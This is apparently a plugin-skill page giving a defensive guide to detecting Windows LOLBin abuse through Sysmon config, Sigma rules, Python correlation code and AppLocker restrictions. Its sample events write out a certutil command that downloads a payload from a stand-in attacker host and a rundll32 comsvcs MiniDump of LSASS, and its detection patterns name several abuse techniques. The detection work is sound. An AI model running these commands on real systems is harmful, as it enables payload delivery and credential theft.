From cybersecurity-skills
Detects LOLBin abuse in Windows via Sysmon process monitoring, command-line analysis, and relationships. Builds SIEM rules, threat hunts fileless attacks, tunes configs.
npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skillsThis skill uses the workspace's default tool permissions.
Monitor for suspicious use of legitimate Windows binaries (LOLBins)
Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.
Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.
Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.
Monitor for suspicious use of legitimate Windows binaries (LOLBins) including certutil, mshta, rundll32, regsvr32, and others used in fileless and living-off-the-land attack techniques.
Do not use for blocking all LOLBin execution outright; these are legitimate system tools with valid administrative uses. Detection must focus on anomalous context (parent process, command-line arguments, network activity) rather than binary presence alone.
evtx, pandas for offline log analysisCreate a Sysmon config that captures the process creation and network events needed for LOLBin detection:
<!-- File: sysmon-lolbin-detection.xml -->
<Sysmon schemaversion="4.90">
<EventFiltering>
<!-- Process Creation: capture all LOLBin executions with full command lines -->
<RuleGroup name="LOLBin Process Creation" groupRelation="or">
<ProcessCreate onmatch="include">
<Image condition="end with">certutil.exe</Image>
<Image condition="end with">mshta.exe</Image>
<Image condition="end with">rundll32.exe</Image>
<Image condition="end with">regsvr32.exe</Image>
<Image condition="end with">msbuild.exe</Image>
<Image condition="end with">installutil.exe</Image>
<Image condition="end with">cmstp.exe</Image>
<Image condition="end with">wmic.exe</Image>
<Image condition="end with">bitsadmin.exe</Image>
<Image condition="end with">certreq.exe</Image>
<Image condition="end with">esentutl.exe</Image>
<Image condition="end with">expand.exe</Image>
<Image condition="end with">extrac32.exe</Image>
<Image condition="end with">findstr.exe</Image>
<Image condition="end with">hh.exe</Image>
<Image condition="end with">ie4uinit.exe</Image>
<Image condition="end with">mavinject.exe</Image>
<Image condition="end with">msiexec.exe</Image>
<Image condition="end with">odbcconf.exe</Image>
<Image condition="end with">pcalua.exe</Image>
<Image condition="end with">presentationhost.exe</Image>
<Image condition="end with">replace.exe</Image>
<Image condition="end with">xwizard.exe</Image>
<!-- PowerShell variants -->
<Image condition="end with">powershell.exe</Image>
<Image condition="end with">pwsh.exe</Image>
<!-- Script hosts -->
<Image condition="end with">cscript.exe</Image>
<Image condition="end with">wscript.exe</Image>
</ProcessCreate>
</RuleGroup>
<!-- Network connections from LOLBins (highly suspicious) -->
<RuleGroup name="LOLBin Network" groupRelation="or">
<NetworkConnect onmatch="include">
<Image condition="end with">certutil.exe</Image>
<Image condition="end with">mshta.exe</Image>
<Image condition="end with">rundll32.exe</Image>
<Image condition="end with">regsvr32.exe</Image>
<Image condition="end with">msbuild.exe</Image>
<Image condition="end with">bitsadmin.exe</Image>
<Image condition="end with">expand.exe</Image>
<Image condition="end with">esentutl.exe</Image>
<Image condition="end with">replace.exe</Image>
</NetworkConnect>
</RuleGroup>
</EventFiltering>
</Sysmon>
# Install or update Sysmon with the LOLBin config
sysmon64.exe -accepteula -i sysmon-lolbin-detection.xml
# Update existing Sysmon installation
sysmon64.exe -c sysmon-lolbin-detection.xml
Write Sigma rules that detect specific abuse patterns, translatable to any SIEM:
# File: sigma/certutil_download.yml
title: Certutil Used to Download File
id: a1b2c3d4-5678-9abc-def0-123456789abc
status: stable
description: >
Detects certutil.exe being used to download files from remote URLs,
a common LOLBin technique for payload delivery (LOLBAS T1105).
references:
- https://lolbas-project.github.io/lolbas/Binaries/Certutil/
- https://attack.mitre.org/techniques/T1105/
author: Threat Detection Team
date: 2026/01/20
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\certutil.exe'
CommandLine|contains|all:
- 'urlcache'
- '-f'
- 'http'
condition: selection
falsepositives:
- Legitimate certificate enrollment using certutil with URL parameters
level: high
tags:
- attack.defense_evasion
- attack.t1218
- attack.command_and_control
- attack.t1105
# File: sigma/mshta_execution.yml
title: MSHTA Executing Remote or Inline Script
id: b2c3d4e5-6789-abcd-ef01-234567890bcd
status: stable
description: >
Detects mshta.exe executing scripts from URLs or inline VBScript/JavaScript,
commonly used for application whitelisting bypass and initial access.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Mshta/
- https://attack.mitre.org/techniques/T1218/005/
logsource:
category: process_creation
product: windows
detection:
selection_remote:
Image|endswith: '\mshta.exe'
CommandLine|contains: 'http'
selection_inline:
Image|endswith: '\mshta.exe'
CommandLine|contains:
- 'vbscript:'
- 'javascript:'
selection_parent_anomaly:
Image|endswith: '\mshta.exe'
ParentImage|endswith:
- '\winword.exe'
- '\excel.exe'
- '\outlook.exe'
- '\powerpnt.exe'
condition: selection_remote or selection_inline or selection_parent_anomaly
falsepositives:
- Legacy HTA-based internal applications
level: high
# File: sigma/regsvr32_scrobj.yml
title: Regsvr32 Squiblydoo Scriptlet Execution
id: c3d4e5f6-7890-bcde-f012-345678901cde
status: stable
description: >
Detects regsvr32.exe loading scrobj.dll with a remote scriptlet URL,
known as the Squiblydoo technique for AppLocker bypass.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
- https://attack.mitre.org/techniques/T1218/010/
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\regsvr32.exe'
CommandLine|contains|all:
- 'scrobj.dll'
- '/i:'
condition: selection
falsepositives:
- Legitimate COM scriptlet registration (rare in modern environments)
level: critical
Parse and correlate Sysmon events to identify suspicious LOLBin execution:
import json
import re
from datetime import datetime, timedelta
from collections import defaultdict
from pathlib import Path
# Known LOLBins and their suspicious command-line indicators
LOLBIN_SIGNATURES = {
"certutil.exe": {
"suspicious_args": [
r"-urlcache\s+-f\s+http",
r"-decode\s+",
r"-encode\s+",
r"-verifyctl\s+.*http",
],
"mitre": "T1218, T1105",
"severity": "high"
},
"mshta.exe": {
"suspicious_args": [
r"https?://",
r"vbscript:",
r"javascript:",
r"about:",
],
"mitre": "T1218.005",
"severity": "high"
},
"rundll32.exe": {
"suspicious_args": [
r"javascript:",
r"shell32\.dll.*ShellExec_RunDLL",
r"\\\\.*\\.*\.dll", # UNC path DLL loading
r"comsvcs\.dll.*MiniDump", # LSASS dump via comsvcs
],
"mitre": "T1218.011",
"severity": "critical"
},
"regsvr32.exe": {
"suspicious_args": [
r"/s\s+/n\s+/u\s+/i:",
r"scrobj\.dll",
r"https?://",
],
"mitre": "T1218.010",
"severity": "critical"
},
"bitsadmin.exe": {
"suspicious_args": [
r"/transfer\s+.*https?://",
r"/create\s+.*\/addfile\s+.*https?://",
r"/SetNotifyCmdLine",
],
"mitre": "T1197",
"severity": "high"
},
"wmic.exe": {
"suspicious_args": [
r"process\s+call\s+create",
r"/node:",
r"os\s+get\s+/format:.*https?://",
r"xsl.*https?://",
],
"mitre": "T1047",
"severity": "high"
},
"msbuild.exe": {
"suspicious_args": [
r"\.xml\b",
r"\.csproj\b",
r"\\temp\\",
r"\\appdata\\",
],
"mitre": "T1127.001",
"severity": "high"
},
"mavinject.exe": {
"suspicious_args": [
r"/INJECTRUNNING\s+\d+",
],
"mitre": "T1218.013",
"severity": "critical"
},
}
def analyze_sysmon_events(events):
"""Analyze Sysmon process creation events for LOLBin abuse."""
alerts = []
for event in events:
image = event.get("Image", "").lower()
cmdline = event.get("CommandLine", "")
parent = event.get("ParentImage", "")
# Check if the process is a known LOLBin
for lolbin, config in LOLBIN_SIGNATURES.items():
if image.endswith(lolbin.lower()):
for pattern in config["suspicious_args"]:
if re.search(pattern, cmdline, re.IGNORECASE):
alert = {
"timestamp": event.get("UtcTime", ""),
"hostname": event.get("Computer", ""),
"lolbin": lolbin,
"command_line": cmdline,
"parent_process": parent,
"user": event.get("User", ""),
"process_id": event.get("ProcessId", ""),
"parent_pid": event.get("ParentProcessId", ""),
"mitre_technique": config["mitre"],
"severity": config["severity"],
"matched_pattern": pattern,
}
alerts.append(alert)
break
return alerts
# Example usage with parsed Sysmon events
sample_events = [
{
"UtcTime": "2026-01-20 14:32:15.000",
"Computer": "WORKSTATION-01",
"Image": "C:\\Windows\\System32\\certutil.exe",
"CommandLine": "certutil.exe -urlcache -f http://evil.example.com/payload.exe C:\\temp\\update.exe",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"User": "CORP\\jsmith",
"ProcessId": "4532",
"ParentProcessId": "2108",
},
{
"UtcTime": "2026-01-20 14:33:01.000",
"Computer": "WORKSTATION-01",
"Image": "C:\\Windows\\System32\\rundll32.exe",
"CommandLine": "rundll32.exe comsvcs.dll, MiniDump 624 C:\\temp\\dump.bin full",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"User": "CORP\\jsmith",
"ProcessId": "5128",
"ParentProcessId": "2108",
},
]
alerts = analyze_sysmon_events(sample_events)
for alert in alerts:
print(f"[{alert['severity'].upper()}] {alert['lolbin']} on {alert['hostname']}")
print(f" MITRE: {alert['mitre_technique']}")
print(f" Command: {alert['command_line'][:120]}")
print(f" Parent: {alert['parent_process']}")
print(f" User: {alert['user']}")
print()
LOLBins making outbound network connections is a strong indicator of malicious use:
def detect_lolbin_network_activity(network_events, process_events):
"""Correlate Sysmon network events (ID 3) with process creation (ID 1)
to find LOLBins making outbound connections."""
# LOLBins that should rarely make outbound connections
NETWORK_SUSPICIOUS = {
"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
"msbuild.exe", "installutil.exe", "bitsadmin.exe", "esentutl.exe",
"expand.exe", "replace.exe", "cmstp.exe", "presentationhost.exe",
}
alerts = []
for event in network_events:
image = event.get("Image", "").lower()
binary_name = image.split("\\")[-1] if "\\" in image else image
if binary_name in NETWORK_SUSPICIOUS:
dest_ip = event.get("DestinationIp", "")
dest_port = event.get("DestinationPort", "")
# Skip localhost and internal DNS
if dest_ip.startswith("127.") or dest_ip == "::1":
continue
alert = {
"type": "lolbin_network_connection",
"binary": binary_name,
"destination_ip": dest_ip,
"destination_port": dest_port,
"destination_hostname": event.get("DestinationHostname", ""),
"source_ip": event.get("SourceIp", ""),
"user": event.get("User", ""),
"timestamp": event.get("UtcTime", ""),
"severity": "critical",
}
alerts.append(alert)
print(f"[CRITICAL] {binary_name} connected to "
f"{dest_ip}:{dest_port} ({event.get('DestinationHostname', 'N/A')})")
return alerts
# Suspicious parent-child relationships indicating LOLBin abuse
SUSPICIOUS_PARENT_CHILD = [
# Office apps spawning LOLBins (macro execution)
{"parent": ["winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"],
"child": ["cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
"wscript.exe", "cscript.exe", "certutil.exe"],
"severity": "critical", "mitre": "T1204.002"},
# Explorer spawning script interpreters directly
{"parent": ["explorer.exe"],
"child": ["mshta.exe", "regsvr32.exe", "msbuild.exe"],
"severity": "high", "mitre": "T1218"},
# WMI provider spawning processes (lateral movement)
{"parent": ["wmiprvse.exe"],
"child": ["cmd.exe", "powershell.exe", "mshta.exe"],
"severity": "critical", "mitre": "T1047"},
# Services spawning unusual children
{"parent": ["services.exe"],
"child": ["cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe"],
"severity": "high", "mitre": "T1543.003"},
]
def check_parent_child_anomaly(event):
"""Check if a process creation event has a suspicious parent-child pair."""
parent = event.get("ParentImage", "").split("\\")[-1].lower()
child = event.get("Image", "").split("\\")[-1].lower()
for rule in SUSPICIOUS_PARENT_CHILD:
if parent in rule["parent"] and child in rule["child"]:
return {
"alert_type": "suspicious_parent_child",
"parent": parent,
"child": child,
"command_line": event.get("CommandLine", ""),
"mitre": rule["mitre"],
"severity": rule["severity"],
"hostname": event.get("Computer", ""),
"user": event.get("User", ""),
"timestamp": event.get("UtcTime", ""),
}
return None
Restrict unnecessary LOLBin execution with application control policies:
# Query current AppLocker policy
Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections
# Create AppLocker rules to restrict certutil to admin-only
$rule = New-AppLockerPolicy -RuleType Publisher -RuleNamePrefix "Block" `
-FileInformation "C:\Windows\System32\certutil.exe" `
-User "S-1-1-0" -Deny
# Export current policy for backup before applying changes
Get-AppLockerPolicy -Effective -Xml > AppLocker_Backup.xml
# Block specific LOLBins for standard users via GPO script
$lolbins_to_restrict = @(
"mshta.exe", "cmstp.exe", "msbuild.exe", "installutil.exe",
"regsvr32.exe", "presentationhost.exe", "ie4uinit.exe",
"mavinject.exe", "xwizard.exe"
)
foreach ($binary in $lolbins_to_restrict) {
$path = "C:\Windows\System32\$binary"
if (Test-Path $path) {
Write-Output "Restricting: $path"
# Apply WDAC deny rule via PowerShell
# In production, use Group Policy or Intune WDAC policies
}
}
sigmac or sigma-cliwinword.exe spawning certutil.exe)certutil.exe or mshta.exe reach out to external IPs